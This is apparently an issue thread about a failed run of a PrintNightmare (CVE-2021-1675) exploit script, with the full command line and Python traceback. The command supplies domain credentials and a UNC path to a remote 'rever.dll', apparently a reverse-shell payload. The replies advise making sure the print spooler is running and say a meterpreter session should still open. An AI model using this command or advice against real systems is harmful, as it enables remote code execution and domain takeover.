SMB SessionError: STATUS_PIPE_CLOSING(The specified named pipe is in the closing state.)

[wxh0000mm]

──(king㉿Kali)-[~/CVE-2021-1675] └─$ sudo python3 CVE-2021-1675.py genyu.com/wxh:Admin123@192.168.175.133 '\192.168.175.132\smb\rever.dll'

[] Connecting to ncacn_np:192.168.175.133[\PIPE\spoolss] [+] Bind OK [+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_83aa9aebf5dffc96\Amd64\UNIDRV.DLL [] Executing \??\UNC\192.168.175.132\smb\rever.dll [] Try 1... [] Stage0: 0 [*] Try 2... Traceback (most recent call last): File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/smbconnection.py", line 568, in writeFile return self._SMBConnection.writeFile(treeId, fileId, data, offset) File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/smb3.py", line 1650, in writeFile written = self.write(treeId, fileId, writeData, writeOffset, len(writeData)) File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/smb3.py", line 1358, in write if ans.isValidAnswer(STATUS_SUCCESS): File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/smb3structs.py", line 454, in isValidAnswer raise smb3.SessionError(self['Status'], self) impacket.smb3.SessionError: SMB SessionError: STATUS_PIPE_CLOSING(The specified named pipe is in the closing state.)

During handling of the above exception, another exception occurred:

Traceback (most recent call last): File "/home/king/CVE-2021-1675/CVE-2021-1675.py", line 190, in main(dce, pDriverPath, options.share) File "/home/king/CVE-2021-1675/CVE-2021-1675.py", line 93, in main resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags) File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rprn.py", line 633, in hRpcAddPrinterDriverEx return dce.request(request) File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 856, in request self.call(request.opnum, request, uuid) File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 845, in call return self.send(DCERPC_RawCall(function, body.getData(), uuid)) File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 1298, in send self._transport_send(data) File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 1235, in _transport_send self._transport.send(rpc_packet.get_packet(), forceWriteAndx = forceWriteAndx, forceRecv = forceRecv) File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/transport.py", line 535, in send self.__smb_connection.writeFile(self.tid, self.handle, data) File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/smbconnection.py", line 570, in writeFile raise SessionError(e.get_error_code(), e.get_error_packet()) impacket.smbconnection.SessionError: SMB SessionError: STATUS_PIPE_CLOSING(The specified named pipe is in the closing state.)

PLEASE HELP ME！！！！

[TiBag93]

I had the same issue a few days ago. You have to make sure that the spooler.exe service is running on your Active Directory. Try turning it on and exploit it again. In my case it worked as expected afterwards.

(I received an error-code in my terminal but the meterpreter session should start properly)

[sasdallas]

@wxh0000mm In my experience it's an error with the spooling service. Try restarting it through taskmgr.